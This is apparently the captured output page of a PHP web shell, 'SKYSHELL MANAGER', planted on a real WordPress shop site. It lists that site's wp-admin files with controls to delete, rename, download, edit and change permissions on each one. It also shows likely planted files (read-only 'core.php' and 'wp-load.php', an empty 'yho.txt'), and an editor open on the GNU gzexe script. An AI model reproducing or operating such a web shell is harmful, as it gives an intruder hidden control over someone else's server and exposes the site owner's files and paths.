📁
SKYSHELL MANAGER
PHP v8.2.29
Create
Create
Path:
root
/
home
/
carl3
/
public_html
/
shop.oppedahl.com
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
16.02 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-ajax.php
5.03 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-header.php
9.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-post.php
1.97 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
contribute.php
5.86 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
core.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
credits.php
4.38 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-background.php
0.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-comments.php
14.14 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-comment.php
8.33 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-link-form.php
6.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tag-form.php
10.42 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export.php
11 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
freedoms.php
4.8 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
import.php
7.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
install-helper.php
6.8 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
install.php
17.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
link-add.php
0.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
link-manager.php
4.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
link-parse-opml.php
2.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
link.php
2.89 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load-scripts.php
2.02 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load-styles.php
2.92 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-new.php
3.17 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media.php
0.8 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu.php
17.72 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
moderation.php
0.3 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-admin.php
0.19 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-delete-site.php
4.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-edit.php
0.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-options.php
0.22 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-sites.php
0.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-themes.php
0.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-upgrade-network.php
0.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
ms-users.php
0.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
my-sites.php
4.72 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
nav-menus.php
49.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options-connectors.php
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options-discussion.php
15.92 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options-general.php
22.32 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options-head.php
0.61 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options-media.php
6.38 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options-permalink.php
21.89 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options-privacy.php
9.92 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options-reading.php
9.97 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options-writing.php
9.1 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
options.php
13.93 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
plugin-editor.php
13.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
plugin-install.php
6.96 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
plugins.php
30 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
post-new.php
2.7 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
post.php
10.03 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy-policy-guide.php
3.67 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
profile.php
0.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
revision.php
5.7 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
site-editor.php
12.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
site-health-info.php
4.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
site-health.php
10.18 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
term.php
2.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
theme-editor.php
16.87 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
theme-install.php
23.55 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.php
47.92 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update-core.php
45.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
upgrade-functions.php
0.33 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
upgrade.php
6.24 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
upload.php
14.9 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-new.php
24.06 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
users.php
23.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form.php
19.14 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
yho.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: gzexe
#!/usr/bin/sh # gzexe: compressor for Unix executables. # Use this only for binaries that you do not use frequently. # # The compressed version is a shell script which decompresses itself after # skipping $skip lines of shell commands. We try invoking the compressed # executable with the original name (for programs looking at their name). # We also try to retain the original file permissions on the compressed file. # For safety reasons, gzexe will not create setuid or setgid shell scripts. # WARNING: the first line of this file must be either : or #!/bin/sh # The : is required for some old versions of csh. # On Ultrix, /bin/sh is too buggy, change the first line to: #!/bin/sh5 # Copyright (C) 1998, 2002, 2004, 2006-2007, 2010-2022 Free Software # Foundation, Inc. # Copyright (C) 1993 Jean-loup Gailly # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. tab=' ' nl=' ' IFS=" $tab$nl" version='gzexe (gzip) 1.12 Copyright (C) 2007, 2011-2018 Free Software Foundation, Inc. This is free software. You may redistribute copies of it under the terms of the GNU General Public License <https://www.gnu.org/licenses/gpl.html>. There is NO WARRANTY, to the extent permitted by law. Written by Jean-loup Gailly.' usage="Usage: $0 [OPTION] FILE... Replace each executable FILE with a compressed version of itself. Make a backup FILE~ of the old version of FILE. -d Decompress each FILE instead of compressing it. --help display this help and exit --version output version information and exit Report bugs to <bug-gzip@gnu.org>." decomp=0 res=0 while :; do case $1 in -d) decomp=1; shift;; --h*) printf '%s\n' "$usage" || exit 1; exit;; --v*) printf '%s\n' "$version" || exit 1; exit;; --) shift; break;; *) break;; esac done if test $# -eq 0; then printf >&2 '%s\n' "$0: missing operand Try \`$0 --help' for more information." exit 1 fi tmp= trap 'res=$? test -n "$tmp" && rm -f "$tmp" (exit $res); exit $res ' 0 1 2 3 5 10 13 15 mktemp_status= for i do case $i in -*) file=./$i;; *) file=$i;; esac if test ! -f "$file" || test ! -r "$file"; then res=$? printf >&2 '%s\n' "$0: $i is not a readable regular file" continue fi if test $decomp -eq 0; then case `LC_ALL=C sed -n -e 1d -e '/^skip=[0-9][0-9]*$/p' -e 2q "$file"` in skip=[0-9] | skip=[0-9][0-9] | skip=[0-9][0-9][0-9]) printf >&2 '%s\n' "$0: $i is already gzexe'd" continue;; esac fi if test -u "$file"; then printf >&2 '%s\n' "$0: $i has setuid permission, unchanged" continue fi if test -g "$file"; then printf >&2 '%s\n' "$0: $i has setgid permission, unchanged" continue fi case /$file in */basename | */bash | */cat | */chmod | */cp | \ */dirname | */expr | */gzip | \ */ln | */mkdir | */mktemp | */mv | */printf | */rm | \ */sed | */sh | */sleep | */test | */tail) printf >&2 '%s\n' "$0: $i might depend on itself"; continue;; esac dir=`dirname "$file"` || dir=$TMPDIR test -d "$dir" && test -w "$dir" && test -x "$dir" || dir=/tmp test -n "$tmp" && rm -f "$tmp" if test -z "$mktemp_status"; then type mktemp >/dev/null 2>&1 mktemp_status=$? fi case $dir in */) ;; *) dir=$dir/;; esac if test $mktemp_status -eq 0; then tmp=`mktemp "${dir}gzexeXXXXXXXXX"` else tmp=${dir}gzexe$$ fi && { cp -p "$file" "$tmp" 2>/dev/null || cp "$file" "$tmp"; } || { res=$? printf >&2 '%s\n' "$0: cannot copy $file" continue } if test -w "$tmp"; then writable=1 else writable=0 chmod u+w "$tmp" || { res=$? printf >&2 '%s\n' "$0: cannot chmod $tmp" continue } fi if test $decomp -eq 0; then (cat <<'EOF' && #!/bin/sh skip=49 tab=' ' nl=' ' IFS=" $tab$nl" umask=`umask` umask 77 gztmpdir= trap 'res=$? test -n "$gztmpdir" && rm -fr "$gztmpdir" (exit $res); exit $res ' 0 1 2 3 5 10 13 15 case $TMPDIR in / | /*/) ;; /*) TMPDIR=$TMPDIR/;; *) TMPDIR=/tmp/;; esac if type mktemp >/dev/null 2>&1; then gztmpdir=`mktemp -d "${TMPDIR}gztmpXXXXXXXXX"` else gztmpdir=${TMPDIR}gztmp$$; mkdir $gztmpdir fi || { (exit 127); exit 127; } gztmp=$gztmpdir/$0 case $0 in -* | */*' ') mkdir -p "$gztmp" && rm -r "$gztmp";; */*) gztmp=$gztmpdir/`basename "$0"`;; esac || { (exit 127); exit 127; } case `printf 'X\n' | tail -n +1 2>/dev/null` in X) tail_n=-n;; *) tail_n=;; esac if tail $tail_n +$skip <"$0" | gzip -cd > "$gztmp"; then umask $umask chmod 700 "$gztmp" (sleep 5; rm -fr "$gztmpdir") 2>/dev/null & "$gztmp" ${1+"$@"}; res=$? else printf >&2 '%s\n' "Cannot decompress $0" (exit 127); res=127 fi; exit $res EOF gzip -cv9 "$file") > "$tmp" || { res=$? printf >&2 '%s\n' "$0: compression not possible for $i, file unchanged." continue } else # decompression skip=49 skip_line=`LC_ALL=C sed -e 1d -e 2q "$file"` case $skip_line in skip=[0-9] | skip=[0-9][0-9] | skip=[0-9][0-9][0-9]) eval "$skip_line";; esac case `printf 'X\n' | tail -n +1 2>/dev/null` in X) tail_n=-n;; *) tail_n=;; esac tail $tail_n +$skip "$file" | gzip -cd > "$tmp" || { res=$? printf >&2 '%s\n' "$0: $i probably not in gzexe format, file unchanged." continue } fi test $writable -eq 1 || chmod u-w "$tmp" || { res=$? printf >&2 '%s\n' "$0: $tmp: cannot chmod" continue } ln -f "$file" "$file~" 2>/dev/null || { # Hard links may not work. Fall back on rm+cp so that $file always exists. rm -f "$file~" && cp -p "$file" "$file~" } || { res=$? printf >&2 '%s\n' "$0: cannot backup $i as $i~" continue } mv -f "$tmp" "$file" || { res=$? printf >&2 '%s\n' "$0: cannot rename $tmp to $i" continue } tmp= done (exit $res); exit $res
Save